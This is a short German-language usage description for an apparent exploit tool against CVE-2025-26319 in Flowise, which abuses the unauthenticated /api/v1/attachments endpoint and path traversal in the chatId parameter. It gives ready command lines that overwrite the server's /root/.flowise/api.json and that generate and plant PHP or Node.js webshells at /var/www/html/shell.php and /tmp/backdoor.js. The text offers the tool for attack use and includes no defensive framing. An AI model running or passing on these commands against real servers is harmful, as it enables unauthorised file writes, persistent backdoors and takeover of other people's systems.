
Exploit für CVE-2025-26319, der auf den /api/v1/attachments-Endpoint von Flowise abzielt und nicht authentifiziertes, willkürliches Hochladen von Dateien sowie die Erstellung von Webshells durch Pfad-Traversal ermöglicht.
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Automatisches Generieren und Hochladen von Webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
Angriffsprinzip Die Route /api/v1/attachments befindet sich in der Whitelist und erfordert keine Authentifizierung Durch Manipulation des chatId-Parameters kann ein Path Traversal (../../../) durchgeführt werden Beliebige Dateien an beliebige Stellen im Server-Dateisystem hochladen